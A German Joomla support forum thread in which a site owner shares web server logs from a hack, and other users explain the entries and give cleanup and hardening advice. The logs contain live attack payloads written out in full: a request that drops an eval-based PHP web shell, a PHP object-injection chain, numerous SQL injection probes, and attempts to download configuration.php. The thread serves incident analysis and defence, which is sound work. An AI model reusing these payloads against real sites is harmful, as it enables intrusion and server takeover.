gehackt: was bedeutet "GET //?1=@ini_set(%22display_errors" im web.log?"

HinzBerlin · 19. Januar 2017

Hallo,
leider wurde unsere joomla Seite letztens gehackt, zum Glück hatten wir DB- und Dateibackups, so dass der Vorzustand wieder hergestellt ist.
Um ein erneutes Hacken zu verhindern, suche ich jetzt den Weg, den der Einbrecher gegangen ist, dabei sind mir die Zeilen unten aufgefallen.
Kann mir jemand sagen, was dieser Aufruf "GET //?1=@ini_set(%22display_errors" im web.log? bedeutet und wie man so etwas verhindern kann?
(Vermutlich per .htaccess, aber was macht dieser Aufruf?)
Die Templatepositionen /?tp habe ich bereits deaktiviert und bin jetzt dabei weitere Tipps von joomla-security umzusetzen.
Ja, der Zugriff auf /administrator ist inzwischen auch per .htaccess blockiert.

Weitere nette log-Zeilen:

Spoiler anzeigen

Vielen Dank
Uwe
joomla 3.6.5

j!-n · 19. Januar 2017

Erfolgreicher Zugriff auf diese beiden Dateien (könnte eine Shell sein):

/cache/cachee.php
/modules/mod_articles_tags/mod_articles_tags.php

Wobei beide nicht zum Joomla-Core gehören. Falls diese Dateien auch im Backup zu finden sind, ist das Backup wertlos. Es werden mit sehr hoher Wahrscheinlichkeit nicht die einzigen Schaddateien sein.

flotte · 19. Januar 2017

Zitat von HinzBerlin

Hallo,
...zum Glück hatten wir DB- und Dateibackups, so dass der Vorzustand wieder hergestellt ist. ...

Also erst alles Rücksichern und dann untersuchen? Damit zerstörst Du Dir einige der wichtigsten Untersuchungsgegenstände: Die Dateien im Webspace.
Ohne ausführliche Analyse wird es nicht möglich sein den Zeitpunkt des Erst-Hacks festzustellen, damit man überhaupt prüfen kann ob das Backup zeitlich passt.
Es gibt doch mittlerweile massenweise Anleitungen, wenn man nur nach "Joomla gehackt" sucht.

HinzBerlin · 20. Januar 2017

Zitat

Also erst alles Rücksichern und dann untersuchen?

Nö, zuerst alles kompett heruntergeladen (einschl. DB) und dann das Backup zurückgespielt.
Zu meiner Frage (Danke für Eure Antworten)
Ich meine eigentlich was dieser GET Befehl GET //?1=@ an sich bedeutet. Normalerweise steht hier doch die URL drin. Will er damit den Apache überlisten? Hat ja offensichtlich geklappt.
Das Modul "mod_articles_tags" hat der Kollege selbst installiert, wir benutzen das nicht und im Backup ist es auch nicht drin.
Der Hack ist ganz schön im web.log zu sehen:

Spoiler anzeigen

Code

62.210.88.198 - - [03/Jan/2017:23:22:58 +0100] "GET / HTTP/1.1" 200 40041 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
62.210.88.198 - - [03/Jan/2017:23:22:59 +0100] "GET / HTTP/1.1" 200 39822 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
62.210.88.198 - - [03/Jan/2017:23:22:59 +0100] "GET / HTTP/1.1" 200 39822 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
62.210.88.198 - - [03/Jan/2017:23:22:59 +0100] "GET //?1=@ini_set(%22display_errors%22,%220%22);@set_time_limit(0);@set_magic_quotes_runtime(0);echo '-%3E%7C';file_put_contents(dirname($_SERVER%5B'SCRIPT_FILENAME'%5D).'/cache/cachee.php','%3C?php eval($_POST%5B1%5D);?%3E');echo '%7C%3C-'; HTTP/1.1" 200 39823 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
62.210.88.198 - - [03/Jan/2017:23:23:00 +0100] "GET //plugins/content/fsave/download.php?filename=configuration.php HTTP/1.1" 404 1572 "-" "-"
62.210.88.198 - - [03/Jan/2017:23:23:00 +0100] "GET / HTTP/1.1" 200 39822 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:46:\"eval($_REQUEST[1]);JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xfd\xfd\xfd\xfd"
62.210.88.198 - - [03/Jan/2017:23:23:00 +0100] "GET //?1=@ini_set(%22display_errors%22,%220%22);@set_time_limit(0);@set_magic_quotes_runtime(0);echo '-%3E%7C';file_put_contents(dirname($_SERVER%5B'SCRIPT_FILENAME'%5D).'/cache/cachee.php','%3C?php eval($_POST%5Bshine%5D);?%3E');echo '%7C%3C-'; HTTP/1.1" 200 39823 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
62.210.88.198 - - [03/Jan/2017:23:23:00 +0100] "GET /index.php?option=com_contenthistory&view=history&list%5Bordering%5D=&item_id=1&type_id=1&list%5Bselect%5D=(select 1 from (select count(*),concat((select 0x6275677363616E776B),floor(rand(0)*2))x from information_schema.tables group by x)a) HTTP/1.1" 403 1749 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
62.210.88.198 - - [03/Jan/2017:23:23:00 +0100] "GET /index.php?jat3action=gzip&type=css&file=configuration.php HTTP/1.1" 200 39831 "-" "-"
62.210.88.198 - - [03/Jan/2017:23:23:01 +0100] "GET /index.php?option=com_jetext&task=download&file=%5B../../index.php%5D HTTP/1.1" 404 1575 "-" "-"
62.210.88.198 - - [03/Jan/2017:23:23:01 +0100] "GET /index.php?option=com_cckjseblod&task=download&file=configuration.php HTTP/1.1" 404 1575 "-" "-"
62.210.88.198 - - [03/Jan/2017:23:23:01 +0100] "GET /administrator/manifests/files/joomla.xml HTTP/1.1" 200 1905 "-" "-"
62.210.88.198 - - [03/Jan/2017:23:23:01 +0100] "GET /index.php/weblinks-categories?id=0 ) union select md5(3.1415)-- ) HTTP/1.1" 404 1572 "-" "-"
62.210.88.198 - - [03/Jan/2017:23:23:02 +0100] "GET /index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/md5(3.1415),222-- - HTTP/1.1" 404 1575 "-" "-"
62.210.88.198 - - [03/Jan/2017:23:23:02 +0100] "GET /index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999+UNION+SELECT+md5(3.1415)-- HTTP/1.1" 404 1575 "-" "-"
62.210.88.198 - - [03/Jan/2017:23:23:02 +0100] "GET /index.php?categoryId=1&controller=deal&keyword=1&locationId=1&option=com_enmasse&sortBy=117 and(select 1 from(select count(*),concat((select (select (select mid(md5(3.1415),1,16)) ) from %60information_schema%60.tables limit 0%2C1)%2Cfloor(rand(0)*2))x from %60information_schema%60.tables group by x)a) and 1=1 HTTP/1.1" 404 1575 "-" "-"
62.210.88.198 - - [03/Jan/2017:23:23:02 +0100] "GET /index.php?option=com_vnmshop&catid=113 LIMIT 0,1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,md5(3.1415),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL HTTP/1.1" 404 1575 "-" "-"
62.210.88.198 - - [03/Jan/2017:23:23:03 +0100] "GET /index.php?option=com_job&controller=listcategory&task=viewJob&id_job=-1+UNION+ALL+SELECT+1,md5(3.1415),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42-- HTTP/1.1" 404 1575 "-" "-"
62.210.88.198 - - [03/Jan/2017:23:23:03 +0100] "GET /index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&pid=24%22 and 1=0 union select 1,2,3,4,5,6,7,8,md5(3.1415),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63%23&cmd=add&cid=20&sid=0.6886686905513422 HTTP/1.1" 404 1575 "-" "-"
62.210.88.198 - - [03/Jan/2017:23:23:03 +0100] "GET /index.php?option=com_memorix&task=result&searchplugin=theme&Itemid=60&ThemeID=-8594+union+select+111,222,MD5(3.1415),444,555,666,777,888,999--+AbuHassan HTTP/1.1" 404 1575 "-" "-"
62.210.88.198 - - [03/Jan/2017:23:23:03 +0100] "GET /index.php?option=com_ebcontent&view=article&tmpl=component&id=MD5(3.1415)&cid=9&print= HTTP/1.1" 404 1575 "-" "-"
62.210.88.198 - - [03/Jan/2017:23:23:04 +0100] "GET //index.php?option=com_subcategory&id=20+UNION+SELECT+md5(3.1415)-- HTTP/1.1" 404 1575 "-" "-"
62.210.88.198 - - [03/Jan/2017:23:23:04 +0100] "GET /index.php?option=com_ebcontent&view=article&tmpl=component&id=MD5(3.1415)&cid=9&print= HTTP/1.1" 404 1575 "-" "-"
62.210.88.198 - - [03/Jan/2017:23:23:04 +0100] "GET /index.php?option=com_contactformmaker&view=contactformmaker&id=1 AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(md5(3.1415),FLOOR (RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)--+ HTTP/1.1" 404 1575 "-" "-"
62.210.88.198 - - [03/Jan/2017:23:23:05 +0100] "GET //index.php?option=com_hotproperty&task=asearch&Item id=27&search_id=2&Itemid=' HTTP/1.1" 404 1575 "-" "-"
62.210.88.198 - - [03/Jan/2017:23:23:05 +0100] "GET /index.php?option=com_jomestate&task=print&id=MD5(3.1415)&cid=9&print= HTTP/1.1" 404 1575 "-" "-"
62.210.88.198 - - [03/Jan/2017:23:23:05 +0100] "GET /administrator/index.php HTTP/1.1" 200 5747 "-" "-"
62.210.88.198 - - [03/Jan/2017:23:23:05 +0100] "GET /administrator/index.php HTTP/1.1" 200 5747 "-" "-"
62.210.88.198 - - [03/Jan/2017:23:23:06 +0100] "POST /administrator/index.php HTTP/1.1" 303 - "http://www.xxxx.de" "-"
62.210.88.198 - - [03/Jan/2017:23:23:06 +0100] "GET /administrator/index.php HTTP/1.1" 200 39789 "http://www.xxxx.de" "-"

Alles anzeigen

Edit by @Indigo66: Langen Code in Spoiler. Forenregeln bechten!

flotte · 20. Januar 2017

Vielleicht hilft Dir das weiter zur Erklärung der konkreten Frage:
https://www.reddit.com/r/sysad…_advice_on_a_php_exploit/

HinzBerlin · 20. Januar 2017

Dank Dir flotte, der Artikel ist sehr interessant

Uwe

flotte · 20. Januar 2017

Das erläutert die eine Zeile. Daneben gibt es diverse weitre typische Hackversuche über die gezeigte IP. Im ersten Posting werden ganz andere IPs gezeigt. Ich vermute es gibt noch _viel_ mehr Aktivität und der tatsächliche Hack ist noch nicht dabei.

flow · 25. Januar 2017

Zitat von HinzBerlin

62.210.88.198 - - [03/Jan/2017:23:22:59 +0100] "GET //?1=@ini_set(%22display_errors%22,%220%22);@set_time_limit(0);@set_magic_quotes_runtime(0);echo '-%3E%7C';file_put_contents(dirname($_SERVER%5B'SCRIPT_FILENAME'%5D).'/cache/cachee.php','%3C?php eval($_POST%5B1%5D);?%3E');echo '%7C%3C-'; HTTP/1.1" 200 39823 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"

Lädt via Datei »cachee.php« weitere Dateien nach, in diesem Fall vermutlich u.a. eine Benutzerverwaltung, die über die neu hinzugefügte, getarnte Datei »mod_articles_tags.php« läuft.

Zitat von HinzBerlin

35.166.247.183 - - [03/Jan/2017:18:53:42 +0100] "POST /admin/Cms_Wysiwyg/directive/index/ HTTP/1.1" 404 1572 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"

Versuch, eine Schwachstelle in einem anderen CMS auszunutzen.

Zitat von HinzBerlin

107.151.137.246 - - [07/Jan/2017:02:59:38 +0100] "POST /modules/mod_articles_tags/mod_articles_tags.php?login=uxgax HTTP/1.1" 200 16 "http://www.xxxx.de/modules/mod_articles_tags/mod_articles_tags.php?login=uxgax" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537 (KHTML, like Gecko)"
192.200.212.204 - - [07/Jan/2017:03:58:50 +0100] "POST /modules/mod_articles_tags/mod_articles_tags.php?login=uxgax HTTP/1.1" 200 12 "-" "-"

Anmeldungen in der »neuen« Benutzerverwaltung.

Zitat von HinzBerlin

Der
Hack ist ganz schön im web.log zu sehen:

Das ist nur ein Teil. Offensichtlich werden jetzt weitere Dateien per »cachee.php« nachgeladen, und, wie von @flotte bereits angemerkt, automatisiert weitere Schwachstellen gesucht. Die Frage ist aber, wie und wann die Datei »cachee.php« in deinen Webspace gekommen ist.

HinzBerlin · 26. Januar 2017

Hallo Leute,
Danke für Eure Beiträge.
Mein Versuch, die Website neu aufzusetzen mit frischen joomla und Plugin Dateien war leider nicht erfolgreich, ich hatte das Template mit Overrides, u.a. mit einem veralteten visforms, und die Datenbank übernommen. Wahrscheinlich war das Hintertürchen noch drin, nach einigen Tagen kam eine freundliche Email von google: "Hacked content detected".
Weil mir jetzt die Zeit davonläuft spiele ich eine alte, pre-joomla, Version der Website ein.
Auf der sicheren Seite ist man nur, wenn man auch alle Overrides neu erstellt und den Webseiteninhalt in einer neuen DB neu anlegt, vermute ich?! Was für eine Arbeit!!
Können diese Gangster Ihre Energie nicht in etwas für die Menschheit sinnvolles investieren? Brech!
Gruß
Uwe

Re:Later · 26. Januar 2017

Zitat von HinzBerlin

Auf der sicheren Seite ist man nur, wenn man auch alle Overrides neu erstellt und den Webseiteninhalt in einer neuen DB neu anlegt, vermute ich?!

Das ist nicht ausreichend, da zusätzliche Hack-Dateien ÜBERALL rumliegen können, in Bilderordnern etc., Nachbar-Domains, vergessenen Installationen von 1876 usw.. Ein Profi prüft auf hinzugefügte Dateien, Dateiunterschiede des gesamten Systems im Vrgl. zu "garantiert sauberen", usw. Und am Ende öffnet er jede Datei, die dabei ungeklärt bleibt.

Dann natürlich (zuvor) sämtliche Zugänge (FTP, DB, Provider usw.), abhärten. Webspace entmüllen usw.

Während dieser Zeit bleibt alles gesperrt und/oder die Prüf-Aktion läuft auf anderem System ab.
Keine Sekunde bleibt während der Zeit das gehackte System offen.

Mit den Log-Dateien, die ja sowieso in den meisten Fällen nicht ausreichend zurückliegend vorliegen, um damit alles zu finden, fange ich (machen andere anders) erst dann an, wenn ich alle Daten, Schadcodes, Schaddateien notiert habe, um noch mal abzusichern.

und so weiter